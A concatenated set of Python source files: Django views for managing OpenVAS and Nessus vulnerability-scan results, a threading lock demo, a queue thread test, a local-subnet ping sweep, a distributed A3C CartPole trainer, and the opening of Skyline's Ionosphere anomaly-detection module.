cvss_base = request.POST.get("cvss_base")
cve = request.POST.get("cve")
# bid = request.POST.get("bid")
xref = request.POST.get("xref")
tags = request.POST.get("tags")
banner = request.POST.get("banner")
ov_scan_result_db.objects.filter(vul_id=vul_id).update(name=name,
creation_time=creation_time,
modification_time=modification_time,
host=host, port=port,
threat=threat,
severity=severity,
description=description, family=family,
cvss_base=cvss_base, cve=cve,
xref=xref, tags=tags, banner=banner)
messages.success(request, "Vulnerability Edited")
return HttpResponseRedirect("/networkscanners/vul_details/?scan_id=%s" % scan_id)
if request.method == 'GET':
id_vul = request.GET['vuln_id']
else:
id_vul = ''
edit_vul_dat = ov_scan_result_db.objects.filter(vul_id=id_vul).order_by('vul_id')
return render(request, 'ov_edit_vuln_data.html', {'edit_vul_dat': edit_vul_dat})
def vuln_check(request):
"""
Get the detailed vulnerability information.
:param request:
:return:
"""
if request.method == 'GET':
id_vul = request.GET['vuln_id']
else:
id_vul = ''
vul_dat = ov_scan_result_db.objects.filter(vul_id=id_vul).order_by('vul_id')
return render(request, 'ov_vuln_data.html', {'vul_dat': vul_dat})
def add_vuln(request):
"""
Add network vulnerability.
:param request:
:return:
"""
if request.method == 'GET':
scan_id = request.GET['scan_id']
else:
scan_id = ''
if request.method == 'POST':
vuln_id = uuid.uuid4()
scan_id = request.POST.get("scan_id")
name = request.POST.get("name")
creation_time = request.POST.get("creation_time")
modification_time = request.POST.get("modification_time")
host = request.POST.get("host")
port = request.POST.get("port", )
threat = request.POST.get("threat", )
severity = request.POST.get("severity", )
description = request.POST.get("description", )
family = request.POST.get("family", )
cvss_base = request.POST.get("cvss_base", )
cve = request.POST.get("cve", )
# bid = request.POST.get("bid")
xref = request.POST.get("xref", )
tags = request.POST.get("tags", )
banner = request.POST.get("banner", )
save_vuln = ov_scan_result_db(name=name,
vul_id=vuln_id,
scan_id=scan_id,
creation_time=creation_time,
modification_time=modification_time,
host=host, port=port,
threat=threat,
severity=severity,
description=description,
family=family,
cvss_base=cvss_base,
cve=cve,
xref=xref,
tags=tags,
banner=banner,
false_positive='No',
)
save_vuln.save()
messages.success(request, "Vulnerability Added")
return HttpResponseRedirect("/networkscanners/vul_details/?scan_id=%s" % scan_id)
return render(request, 'ov_add_vuln.html', {'scan_id': scan_id})
def OpenVas_xml_upload(request):
"""
OpenVAS XML file upload.
:param request:
:return:
"""
all_project = project_db.objects.all()
if request.method == "POST":
project_id = request.POST.get("project_id")
scanner = request.POST.get("scanner")
xml_file = request.FILES['xmlfile']
scan_ip = request.POST.get("scan_url")
scan_id = uuid.uuid4()
scan_status = "100"
if scanner == "openvas":
date_time = datetime.now()
scan_dump = scan_save_db(scan_ip=scan_ip,
scan_id=scan_id,
date_time=date_time,
project_id=project_id,
scan_status=scan_status)
scan_dump.save()
tree = ET.parse(xml_file)
root_xml = tree.getroot()
OpenVas_Parser.xml_parser(project_id=project_id,
scan_id=scan_id,
root=root_xml)
return HttpResponseRedirect("/networkscanners/")
elif scanner == "nessus":
date_time = datetime.now()
scan_dump = nessus_scan_db(
scan_ip=scan_ip,
scan_id=scan_id,
date_time=date_time,
project_id=project_id,
scan_status=scan_status
)
            scan_dump.save()
tree = ET.parse(xml_file)
root_xml = tree.getroot()
Nessus_Parser.nessus_parser(root=root_xml,
scan_id=scan_id,
project_id=project_id,
)
return HttpResponseRedirect("/networkscanners/nessus_scan")
return render(request,
'net_upload_xml.html',
{'all_project': all_project})
@background(schedule=60)
def task(target_ip, project_id, scanner):
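    """Background task (django-background-tasks) for scheduled network scans.
    Splits the comma-separated target list and, for the 'open_vas' scanner,
    starts one daemon thread per target that runs openvas_scanner().
    """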
rescan_id = ''
rescan = 'No'
sel_profile = ''
ip = target_ip.replace(" ", "")
target__split = ip.split(',')
split_length = target__split.__len__()
for i in range(0, split_length):
target = target__split.__getitem__(i)
if scanner == 'open_vas':
thread = threading.Thread(target=openvas_scanner, args=(target, project_id, sel_profile))
thread.daemon = True
thread.start()
return HttpResponse(status=200)
def net_scan_schedule(request):
"""
:param request:
:return:
"""
all_scans_db = project_db.objects.all()
all_scheduled_scans = task_schedule_db.objects.all()
if request.method == 'POST':
scan_ip = request.POST.get('ip')
scan_schedule_time = request.POST.get('datetime')
project_id = request.POST.get('project_id')
scanner = request.POST.get('scanner')
# periodic_task = request.POST.get('periodic_task')
periodic_task_value = request.POST.get('periodic_task_value')
# periodic_task = 'Yes'
        print('scanner-', scanner)
if periodic_task_value == 'HOURLY':
periodic_time = Task.HOURLY
elif periodic_task_value == 'DAILY':
periodic_time = Task.DAILY
elif periodic_task_value == 'WEEKLY':
periodic_time = Task.WEEKLY
elif periodic_task_value == 'EVERY_2_WEEKS':
periodic_time = Task.EVERY_2_WEEKS
elif periodic_task_value == 'EVERY_4_WEEKS':
periodic_time = Task.EVERY_4_WEEKS
else:
periodic_time = None
dt_str = scan_schedule_time
dt_obj = datetime.strptime(dt_str, '%d/%m/%Y %H:%M:%S %p')
print "scan_ip", scan_ip
print "schedule", scan_schedule_time
# task(scan_ip, project_id, schedule=dt_obj)
ip = scan_ip.replace(" ", "")
target__split = ip.split(',')
split_length = target__split.__len__()
for i in range(0, split_length):
target = target__split.__getitem__(i)
if scanner == 'open_vas':
if periodic_task_value == 'None':
my_task = task(target, project_id, scanner, schedule=dt_obj)
task_id = my_task.id
print "Savedddddd taskid", task_id
else:
my_task = task(target, project_id, scanner, repeat=periodic_time, repeat_until=None)
task_id = my_task.id
print "Savedddddd taskid", task_id
save_scheadule = task_schedule_db(task_id=task_id, target=target,
schedule_time=scan_schedule_time,
project_id=project_id,
scanner=scanner,
periodic_task=periodic_task_value)
save_scheadule.save()
return render(request, 'network_scan_schedule.html',
{'all_scans_db': all_scans_db,
'all_scheduled_scans': all_scheduled_scans}
)
def del_net_scan_schedule(request):
"""
:param request:
:return:
"""
if request.method == "POST":
task_id = request.POST.get('task_id')
scan_item = str(task_id)
taskid = scan_item.replace(" ", "")
target_split = taskid.split(',')
split_length = target_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
task_id = target_split.__getitem__(i)
del_task = task_schedule_db.objects.filter(task_id=task_id)
del_task.delete()
del_task_schedule = Task.objects.filter(id=task_id)
del_task_schedule.delete()
return HttpResponseRedirect('/networkscanners/net_scan_schedule')
def nessus_scan(request):
"""
:param request:
:return:
"""
all_scan = nessus_scan_db.objects.all()
return render(request,
'nessus_scan.html',
{'all_scan': all_scan}
)
def nessus_vuln_details(request):
"""
:param request:
:return:
"""
scanid = ""
if request.method == 'GET':
scanid = request.GET['scan_id']
print "scansss", scanid
if request.method == 'POST':
vuln_id = request.POST.get('vuln_id')
scan_id = request.POST.get('scan_id')
false_positive = request.POST.get('false')
nessus_report_db.objects.filter(scan_id=scan_id,
vul_id=vuln_id).update(false_positive=false_positive)
return HttpResponseRedirect(
'/networkscanners/nessus_vuln_details/?scan_id=%s' % scan_id)
all_vuln = nessus_report_db.objects.filter(scan_id=scanid,
false_positive='No')
all_false_vul = nessus_report_db.objects.filter(scan_id=scanid,
false_positive='Yes')
print "zzzzzz", scanid
return render(request,
'nessus_vuln_details.html',
{'all_vuln': all_vuln,
'scan_id': scanid,
'all_false_vul': all_false_vul})
def delete_nessus_scan(request):
if request.method == "POST":
scan_id = request.POST.get('scan_id')
del_vuln = request.POST.get('del_vuln')
scan_item = str(scan_id)
taskid = scan_item.replace(" ", "")
target_split = taskid.split(',')
split_length = target_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
task_id = target_split.__getitem__(i)
del_rep = nessus_report_db.objects.filter(scan_id=task_id)
del_rep.delete()
del_scan = nessus_scan_db.objects.filter(scan_id=task_id)
del_scan.delete()
return HttpResponseRedirect('/networkscanners/nessus_scan')
def delete_nessus_vuln(request):
if request.method == "POST":
vuln_id = request.POST.get("del_vuln")
un_scanid = request.POST.get("scan_id")
print "scan_iddd", un_scanid
scan_item = str(vuln_id)
value = scan_item.replace(" ", "")
value_split = value.split(',')
split_length = value_split.__len__()
print "split_lenght", split_length
for i in range(0, split_length):
vuln_id = value_split.__getitem__(i)
delete_vuln = nessus_report_db.objects.filter(vul_id=vuln_id)
delete_vuln.delete()
ov_all_vul = nessus_report_db.objects.filter(scan_id=un_scanid).order_by('scan_id')
total_vul = len(ov_all_vul)
total_critical = len(ov_all_vul.filter(risk_factor="Critical"))
total_high = len(ov_all_vul.filter(risk_factor="High"))
total_medium = len(ov_all_vul.filter(risk_factor="Medium"))
total_low = len(ov_all_vul.filter(risk_factor="Low"))
nessus_scan_db.objects.filter(scan_id=un_scanid) \
.update(total_vul=total_vul,
critical_total=total_critical,
high_total=total_high,
medium_total=total_medium,
low_total=total_low)
# messages.success(request, "Deleted vulnerability")
return HttpResponseRedirect("/networkscanners/nessus_vuln_details/?scan_id=%s" % un_scanid)
def nessus_vuln_check(request):
"""
Get the detailed vulnerability information.
:param request:
:return:
"""
if request.method == 'GET':
id_vul = request.GET['vuln_id']
else:
id_vul = ''
vul_dat = nessus_report_db.objects.filter(vul_id=id_vul)
return render(request, 'nessus_vuln_data.html', {'vul_dat': vul_dat})
|
thread_RLock.py
|
"""
Race condition
Thread safe
Dead lock
atomic
"""
from threading import Thread, RLock
num = 0 # shared resource
lock = RLock()
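# A re-entrant lock (RLock) is needed here: add() calls subtract() while it
# already holds the lock, so the same thread acquires the lock a second time.
# With a plain Lock that second acquisition would block forever (deadlock).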
def add():
global num
with lock:
subtract()
for _ in range(100000):
num += 1
def subtract():
global num
with lock:
for _ in range(100000):
num -= 1
def both():
subtract()
add()
t1 = Thread(target=add)
t2 = Thread(target=subtract)
t1.start()
t2.start()
t1.join()
t2.join()
print(num)
print('Done . . . ')
|
queue_threads.py
|
import unittest
import json
import time
from functools import wraps
from threading import Thread, Lock
from app import app
from data.queue import WorkQueue
from initdb import wipe_database, initialize_database, populate_database
QUEUE_NAME = "testqueuename"
class AutoUpdatingQueue(object):
def __init__(self, queue_to_wrap):
self._queue = queue_to_wrap
def _wrapper(self, func):
@wraps(func)
def wrapper(*args, **kwargs):
to_return = func(*args, **kwargs)
self._queue.update_metrics()
return to_return
return wrapper
def __getattr__(self, attr_name):
method_or_attr = getattr(self._queue, attr_name)
if callable(method_or_attr):
return self._wrapper(method_or_attr)
else:
return method_or_attr
class QueueTestCase(unittest.TestCase):
TEST_MESSAGE_1 = json.dumps({"data": 1})
def setUp(self):
self.transaction_factory = app.config["DB_TRANSACTION_FACTORY"]
self.queue = AutoUpdatingQueue(WorkQueue(QUEUE_NAME, self.transaction_factory))
wipe_database()
initialize_database()
populate_database()
class TestQueueThreads(QueueTestCase):
def test_queue_threads(self):
count = [20]
for i in range(count[0]):
self.queue.put([str(i)], self.TEST_MESSAGE_1)
lock = Lock()
def get(lock, count, queue):
item = queue.get()
if item is None:
return
self.assertEqual(self.TEST_MESSAGE_1, item.body)
with lock:
count[0] -= 1
threads = []
# The thread count needs to be a few times higher than the queue size
# count because some threads will get a None and thus won't decrement
# the counter.
for i in range(100):
t = Thread(target=get, args=(lock, count, self.queue))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(count[0], 0)
if __name__ == "__main__":
unittest.main()
|
main.py
|
import os
import threading
import time
class IPList:
    # Pings every address in the 192.168.178.0/24 subnet from a pool of worker
    # threads and collects the hosts that reply (Windows-specific ping parsing).
    def __init__(self):
        self.IP_LIST = []
        self.MAX_THREAD = 500
        self._r_th = 0    # number of worker threads currently running
        self._slt = []    # addresses still left to check
        self._ipl = []    # addresses that replied
        self._lock = threading.Lock()    # guards the shared lists and counter
        for i in range(1, 255):
            self.IP_LIST += [f"192.168.178.{i}"]
    def _check_one(self):
        # Atomically take the next address off the work list; exit if empty.
        with self._lock:
            if len(self._slt) == 0:
                return
            self._r_th += 1
            ip = self._slt.pop(0)
        # One ping with a 100 ms timeout; inspect the third output line for the
        # usual Windows failure messages.
        o = os.popen(f"@echo off&&cd C:\\Windows\\System32\\&&ping {ip} -n 1 -w 100 -l 1").read()
        reply = o.split("\n")[2]
        if reply != "Request timed out." and "Destination host unreachable." not in reply:
            with self._lock:
                self._ipl += [ip]
        # Spawn a successor thread so the work list keeps draining.
        thr = threading.Thread(target=self._check_one, args=(), kwargs={})
        thr.start()
        with self._lock:
            self._r_th -= 1
    def check_all(self):
        self._slt = self.IP_LIST[:]
        self._ipl = []
        # Start up to MAX_THREAD workers; each one re-spawns itself until the
        # work list is empty.
        for i in range(1, self.MAX_THREAD):
            thr = threading.Thread(target=self._check_one, args=(), kwargs={})
            thr.start()
        # Wait until the work list is drained and all workers have finished,
        # sleeping briefly instead of busy-spinning.
        while len(self._slt) > 0 or self._r_th > 0:
            time.sleep(0.05)
        return self._ipl
def check_loop(self):
while (True):
ipl=self.check_all()
ipl.sort()
os.system("cls")
print("Active IP's:\n\n"+"\n".join(ipl))
IPList().check_loop()
|
A3C_distributed_tf.py
|
"""
Asynchronous Advantage Actor Critic (A3C) with discrete action space, Reinforcement Learning.
The Cartpole example using distributed tensorflow + multiprocessing.
"""
import multiprocessing as mp
import tensorflow as tf
import numpy as np
import gym, time
import matplotlib.pyplot as plt
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.001
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
env = gym.make('CartPole-v0')
N_S = env.observation_space.shape[0]
N_A = env.action_space.n
class ACNet(object):
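    """Actor-critic network used by both the global net and the workers.
    The 'global_net' scope only builds the shared actor/critic parameters;
    worker scopes additionally build the losses, local gradients, and the
    pull (sync from global) / push (apply gradients to global) ops.
    """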
sess = None
def __init__(self, scope, opt_a=None, opt_c=None, global_net=None):
if scope == 'global_net': # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else:
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('a_loss'):
log_prob = tf.reduce_sum(
tf.log(self.a_prob) * tf.one_hot(self.a_his, N_A, dtype=tf.float32),
axis=1, keep_dims=True)
exp_v = log_prob * tf.stop_gradient(td)
entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),
axis=1, keep_dims=True) # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
self.global_step = tf.train.get_or_create_global_step()
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, global_net.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, global_net.c_params)]
with tf.name_scope('push'):
self.update_a_op = opt_a.apply_gradients(zip(self.a_grads, global_net.a_params), global_step=self.global_step)
self.update_c_op = opt_c.apply_gradients(zip(self.c_grads, global_net.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
a_prob = tf.layers.dense(l_a, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return a_prob, v, a_params, c_params
def choose_action(self, s): # run by a local
prob_weights = self.sess.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
action = np.random.choice(range(prob_weights.shape[1]),
p=prob_weights.ravel()) # select action w.r.t the actions prob
return action
def update_global(self, feed_dict): # run by a local
self.sess.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
self.sess.run([self.pull_a_params_op, self.pull_c_params_op])
def work(job_name, task_index, global_ep, lock, r_queue, global_running_r):
# set work's ip:port
cluster = tf.train.ClusterSpec({
"ps": ['localhost:2220', 'localhost:2221',],
"worker": ['localhost:2222', 'localhost:2223', 'localhost:2224', 'localhost:2225',]
})
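    # This spec must match the jobs list under __main__: 2 parameter servers on
    # ports 2220-2221 and 4 workers on ports 2222-2225, one local process per task.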
server = tf.train.Server(cluster, job_name=job_name, task_index=task_index)
if job_name == 'ps':
        print('Start Parameter Server: ', task_index)
server.join()
else:
t1 = time.time()
env = gym.make('CartPole-v0').unwrapped
print('Start Worker: ', task_index)
with tf.device(tf.train.replica_device_setter(
worker_device="/job:worker/task:%d" % task_index,
cluster=cluster)):
opt_a = tf.train.RMSPropOptimizer(LR_A, name='opt_a')
opt_c = tf.train.RMSPropOptimizer(LR_C, name='opt_c')
global_net = ACNet('global_net')
local_net = ACNet('local_ac%d' % task_index, opt_a, opt_c, global_net)
# set training steps
hooks = [tf.train.StopAtStepHook(last_step=100000)]
with tf.train.MonitoredTrainingSession(master=server.target,
is_chief=True,
hooks=hooks,) as sess:
print('Start Worker Session: ', task_index)
local_net.sess = sess
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while (not sess.should_stop()) and (global_ep.value < 1000):
s = env.reset()
ep_r = 0
while True:
# if task_index:
# env.render()
a = local_net.choose_action(s)
s_, r, done, info = env.step(a)
if done: r = -5.
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = sess.run(local_net.v, {local_net.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
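                        # Illustrative example (assumed values, not from a run): with
                        # GAMMA = 0.9, buffer_r = [1., 1., 1.] and bootstrap v_s_ = 0.5
                        # the reversed pass gives 1 + 0.9*0.5 = 1.45, then 2.305, then
                        # 3.0745, so buffer_v_target = [3.0745, 2.305, 1.45] after reverse().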
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(
buffer_v_target)
feed_dict = {
local_net.s: buffer_s,
local_net.a_his: buffer_a,
local_net.v_target: buffer_v_target,
}
local_net.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
local_net.pull_global()
s = s_
total_step += 1
if done:
if r_queue.empty(): # record running episode reward
global_running_r.value = ep_r
else:
global_running_r.value = .99 * global_running_r.value + 0.01 * ep_r
r_queue.put(global_running_r.value)
print(
"Task: %i" % task_index,
"| Ep: %i" % global_ep.value,
"| Ep_r: %i" % global_running_r.value,
"| Global_step: %i" % sess.run(local_net.global_step),
)
with lock:
global_ep.value += 1
break
print('Worker Done: ', task_index, time.time()-t1)
if __name__ == "__main__":
    # use multiprocessing to create a local cluster with 2 parameter servers and 4 workers
global_ep = mp.Value('i', 0)
lock = mp.Lock()
r_queue = mp.Queue()
global_running_r = mp.Value('d', 0)
jobs = [
('ps', 0), ('ps', 1),
('worker', 0), ('worker', 1), ('worker', 2), ('worker', 3)
]
ps = [mp.Process(target=work, args=(j, i, global_ep, lock, r_queue, global_running_r), ) for j, i in jobs]
[p.start() for p in ps]
    # Only wait for the worker processes; the two parameter server processes
    # block forever in server.join() and are left running.
    [p.join() for p in ps[2:]]
ep_r = []
while not r_queue.empty():
ep_r.append(r_queue.get())
plt.plot(np.arange(len(ep_r)), ep_r)
plt.title('Distributed training')
plt.xlabel('Step')
plt.ylabel('Total moving reward')
plt.show()
|
ionosphere.py
|
from __future__ import division
import logging
import os
from os import kill, getpid, listdir
from os.path import join, isfile
from sys import version_info
try:
from Queue import Empty
except:
from queue import Empty
from time import time, sleep
from threading import Thread
from multiprocessing import Process, Manager
import re
from shutil import rmtree
import csv
from ast import literal_eval
from datetime import datetime
from redis import StrictRedis
import traceback
import mysql.connector
# from mysql.connector import errorcode
from sqlalchemy.sql import select
# @added 20180715 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
from sqlalchemy.sql import desc
# @added 20161213 - Branch #1790: test_tsfresh
# To match the new order introduced via the test_tsfresh method
import numpy as np
# import pandas as pd
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
from tsfresh import __version__ as tsfresh_version
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
from pymemcache.client.base import Client as pymemcache_Client
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
import pandas as pd
from tsfresh.feature_extraction import (
extract_features, ReasonableFeatureExtractionSettings)
import settings
from skyline_functions import (
fail_check, mysql_select, write_data_to_file, send_graphite_metric, mkdir_p,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
get_memcache_metric_object)
# @added 20161221 - calculate features for every anomaly, instead of making the
# user do it in the frontend or calling the webapp constantly in a cron like
# manner. Decouple Ionosphere from the webapp.
from features_profile import calculate_features_profile
# @modified 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched_meta
from database import (
get_engine, ionosphere_table_meta, metrics_table_meta,
ionosphere_matched_table_meta)
from tsfresh_feature_names import TSFRESH_FEATURES
# @added 20170114 - Feature #1854: Ionosphere learn
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# from learn import learn
from learn import ionosphere_learn
# @added 20170306 - Feature #1960: ionosphere_layers
from layers import run_layer_algorithms
skyline_app = 'ionosphere'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
# Converting one settings variable into a local variable, just because it is a
# long string otherwise.
try:
ENABLE_IONOSPHERE_DEBUG = settings.ENABLE_IONOSPHERE_DEBUG
except:
logger.error('error :: cannot determine ENABLE_IONOSPHERE_DEBUG from settings')
ENABLE_IONOSPHERE_DEBUG = False
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# Number of processes to assign to Ionosphere, however Ionosphere should never
# need more than 1 and is effectively hard coded as such currently. This
# variable is only declared for the purpose of maintaining a standard set up in
# each module and to possibly enable more than one processor on Ionosphere in
# the future, should there be a requirement for Ionosphere to analyse the
# metrics quicker. Running Ionosphere with more than one process is untested
# and currently it is hard coded to be 1
# (https://github.com/earthgecko/skyline/issues/69)
try:
ionosphere_processes = settings.IONOSPHERE_PROCESSES
if ionosphere_processes != 1:
ionosphere_processes = 1
except:
ionosphere_processes = 1
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
max_age_seconds = settings.IONOSPHERE_CHECK_MAX_AGE
# Database configuration
config = {'user': settings.PANORAMA_DBUSER,
'password': settings.PANORAMA_DBUSERPASS,
'host': settings.PANORAMA_DBHOST,
'port': settings.PANORAMA_DBPORT,
'database': settings.PANORAMA_DATABASE,
'raise_on_warnings': True}
failed_checks_dir = '%s_failed' % settings.IONOSPHERE_CHECK_PATH
last_purge_key = '%s.last_purge_ts' % skyline_app
LOCAL_DEBUG = False
class Ionosphere(Thread):
"""
The Ionosphere class which controls the ionosphere thread and spawned
processes.
"""
def __init__(self, parent_pid):
"""
Initialize Ionosphere
Create the :obj:`self.anomalous_metrics` list
"""
super(Ionosphere, self).__init__()
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
if settings.REDIS_PASSWORD:
self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.mysql_conn = mysql.connector.connect(**config)
self.anomalous_metrics = Manager().list()
self.not_anomalous = Manager().list()
self.features_profiles_checked = Manager().list()
self.training_metrics = Manager().list()
self.sent_to_panorama = Manager().list()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Added lists of ionosphere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
self.ionosphere_smtp_alerter_metrics = Manager().list()
self.ionosphere_non_smtp_alerter_metrics = Manager().list()
# @added 20170306 - Feature #1960: ionosphere_layers
self.layers_checked = Manager().list()
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
self.memcache_client = pymemcache_Client((settings.MEMCACHED_SERVER_IP, settings.MEMCACHED_SERVER_PORT), connect_timeout=0.1, timeout=0.2)
else:
self.memcache_client = None
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
"""
These are the ionosphere mysql functions used to surface and input
ionosphere data for timeseries.
"""
def mysql_insert(self, insert):
"""
Insert data into mysql table
:param insert: the insert string
:type insert: str
:return: int
:rtype: int or boolean
- **Example usage**::
query = 'insert into host (host) VALUES (\'this_host\')'
result = self.mysql_insert(query)
.. note::
- If the MySQL query fails a boolean will be returned not a tuple
* ``False``
* ``None``
"""
try:
cnx = mysql.connector.connect(**config)
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to mysql')
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('error :: failed to connect to mysql')
raise
if cnx:
try:
cursor = cnx.cursor()
cursor.execute(insert)
inserted_id = cursor.lastrowid
# Make sure data is committed to the database
cnx.commit()
cursor.close()
cnx.close()
return inserted_id
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('Failed to insert record')
cnx.close()
raise
else:
cnx.close()
return False
return False
def purge_old_data_dirs(self, dir_path, older_than):
time_now = time()
logger.info(
'Cleaning old training data from %s older than %s seconds' %
(dir_path, str(older_than)))
try:
for path, folders, files in os.walk(dir_path):
for folder in folders[:]:
folder_path = os.path.join(path, folder)
# Only timestamped directories are removed
                    if re.match(r'\d{10}', folder):
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: matched - %s' % folder_path)
if (time_now - os.path.getmtime(folder_path)) > older_than:
try:
rmtree(folder_path)
logger.info('removed - %s' % folder_path)
except:
logger.error('error :: failed to rmtree %s' % folder_path)
except:
logger.info(traceback.format_exc())
logger.error('error :: purge_old_data_dirs - os.walk')
last_purge_ts = int(time())
try:
self.redis_conn.setex(last_purge_key, 1800, last_purge_ts)
logger.info('updated Redis key for %s' % last_purge_key)
except:
logger.error('error :: failed to update Redis key for %s' % last_purge_key)
backup_purge_ts_file = '%s/last_purge_ts.txt' % (settings.IONOSPHERE_DATA_FOLDER)
try:
write_data_to_file(skyline_app, backup_purge_ts_file, 'w', last_purge_ts)
logger.info('updated the backup_purge_ts_file with %s' % str(last_purge_ts))
except:
logger.error('error :: failed to update the backup_purge_ts_file - %s' % backup_purge_ts_file)
return
def remove_metric_check_file(self, metric_check_file):
if os.path.isfile(str(metric_check_file)):
try:
os.remove(str(metric_check_file))
logger.info('metric_check_file removed - %s' % str(metric_check_file))
except OSError:
pass
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
def manage_ionosphere_unique_metrics(self):
"""
Create a Redis set of all Ionosphere enabled metrics.
:return: returns True
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
trace = traceback.format_exc()
logger.error('%s' % trace)
log_msg = 'error :: failed to get MySQL engine for manage_ionosphere_unique_metrics'
logger.error('%s' % log_msg)
return None, log_msg, trace
ionosphere_unique_metrics_count = 0
redis_ionosphere_unique_metrics = None
ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
manage_ionosphere_unique_metrics = True
manage_ionosphere_unique_metrics_key = []
try:
manage_ionosphere_unique_metrics_key = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
if LOCAL_DEBUG:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics key: %s' % str(e))
if manage_ionosphere_unique_metrics_key is not None:
manage_ionosphere_unique_metrics = False
logger.info('getting MySQL engine for ionosphere_enabled_metrics')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
